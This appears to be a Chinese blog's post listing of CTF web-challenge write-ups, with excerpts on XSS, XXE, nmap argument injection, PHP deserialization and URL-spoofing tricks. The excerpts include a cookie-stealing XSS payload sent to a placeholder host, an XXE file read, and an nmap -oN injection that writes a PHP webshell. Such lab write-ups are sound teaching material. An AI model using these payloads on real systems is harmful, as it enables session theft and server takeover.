自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(14)
  • 资源 (3)
  • 收藏
  • 关注

原创 [BJDCTF 2nd]xss之光

[BJDCTF 2nd]xss之光御剑看了一下url,输入啥都不对。掏出御剑直接扫,扫出一个.gitGitHack安排得到:<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);原生类反序列化参考构造payload:<?php$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</s

2020-11-27 14:56:09 208

原创 [BJDCTF2020]EasySearch

[BJDCTF2020]EasySearch御剑扫一波扫到一个index.php.swp<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0

2020-11-27 14:11:03 181

原创 2020年极客大挑战WEB部分WP

WriteUPWelcome题目地址: http://49.234.224.119:8000/题目描述: 欢迎来到极客大挑战!访问题目链接,发现405报错。百度了一下,发现是GET或者POST请求出问题了。拿Postman试一下:看了一下需要POST上传一个roam1,roam2,这两个的值不能相等,哈希值要相等,好了,传入数组。因为各种哈希都无法对数组进行操作,会返回False。然后又因为False === False => True,所以顺利绕过~在phpinfo里面找找可以

2020-11-23 17:54:16 1806 1

原创 [CISCN2019 华北赛区 Day1 Web2]ikun

[CISCN2019 华北赛区 Day1 Web2]ikunshopping要买到lv6,然而当前页面上没有lv6,爆破页面来搞事情。import requestsurl="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page="for i in range(0,2000): print(i) r=requests.get( url + str(i) ) if 'lv6.png' in

2020-11-15 20:31:07 1786

原创 [NCTF2019]True XML cookbook

[NCTF2019]True XML cookbook爆破抓包爆破,想直接爆出密码。然鹅我天真了。XXE漏洞这里存在XXE漏洞,利用脚本直接打:构造:<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE hack [<!ENTITY file SYSTEM "file:///flag">]><user> <username>&admin;</username&gt

2020-11-15 17:37:41 380

原创 [极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL先骂出题人出题人是真的狗,废话不多说先放最后爆破的结果:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{01d295cf-0c9c-44db-98ca-c7877

2020-11-15 14:39:25 2333 1

原创 [网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmapnmap本题的考点是利用nmap的-oN写shell。nmap -oN xxx.txt先构造:' -oN w4ke.txt '返回了Host maybe down,然后访问一下w4ke.txt构造:' -oN w4ke.php <?php eval($_POST['w4ke']); ?> '返回了Hacker...fuzz了一下,发现了php被过滤,phtml可以用。于是构造:' -oN w4ke.phtml <?=

2020-11-14 16:24:44 192

原创 [WUSTCTF2020]朴实无华

[WUSTCTF2020]朴实无华robots.txt首先拿御剑扫一下(因为buu上的docker性能不太行,扫多了就崩,所以建议用dirsearch并带上延时)。扫出了个robots.txtmdzz假flag,傻逼玩意。在响应头里面有fl4g.php.<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (i

2020-11-14 15:21:23 157

原创 [安洵杯 2019]easy_serialize_php

[安洵杯 2019]easy_serialize_php看源码对源码的一些解释已经注释在源码里了<?php$function = @$_GET['f'];function filter($img){ //这里会过滤这几个字符 $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pre

2020-11-14 00:15:36 201

原创 [GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库御剑扫一波http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txthttp://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.phphttp

2020-11-04 19:47:54 169

原创 [BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此php伪协议源码如下<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h

2020-11-02 20:56:14 170

原创 使用Docker搭建SQL注入靶场

Docker搭建SQL注入漏洞什么是DockerDocker又被叫做容器,使用教程参考我的博客:传送门如何搭建靶场这里以ubuntu上搭建docker为例首先下载docker:apt install docker.ioapt install docker-compose如何搭建web服务器一般来说比较推荐Apache,详细教程请查看我的博客如何写php文件以一个简单的php文件为例,如果有需要请自行增加功能。<?phperror_reporting(0);

2020-11-02 17:59:48 2808 1

原创 python一键搭ftp服务器

首先需要下载pyftpdlib模块:pip install pyftpdlib然后在命令行下输入:python -m pyftpdlib至此,ftp服务器已搭建完成,大概也就几十秒的样子······访问ftp://127.0.0.1:2121即可进入ftp服务器更多指令可以查看大佬博客。传送门...

2020-11-02 13:30:35 363

原创 域名伪装

参考链接这里利用了一个不算漏洞的漏洞:浏览器在解析URL的时候默认丢掉@前面的所有东西。比如https://www.baidu.com@www.cnblogs.com/shenjuxian不注意看的话会以为是百度的,其实跳转到了另一个网站,如果黑客在后面网站上挂马的话很容易就中招啦。这里两个网址,看起来花里胡哨的,那如果后面跟一个ip呢:https://www.baidu.com@111.229.229.111看起来就稍微不那么显眼啦ip中的点还是很难受,那就将它变为纯数字,计算方式如下:

2020-11-01 15:19:09 3745 2

QQ防撤回组件之IM.dll

QQ防撤回组件之IM.dll

2021-05-30

基于新浪微博的大数据爬虫

使用selium、beautifulsoup、lxml库对微博的一个爬虫,解放双手,适合大数据分析。 未采用多线程,对服务器不造成太大压力。

2020-08-15

自动下载百度图片.py

改代码为基于python的网络爬虫,由用户提供关键字并运行脚本,爬虫自动在百度图片区下载相关图片。该代码未使用多线程技术,并不会对网络产生较大拥塞,故此分享。

2020-03-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除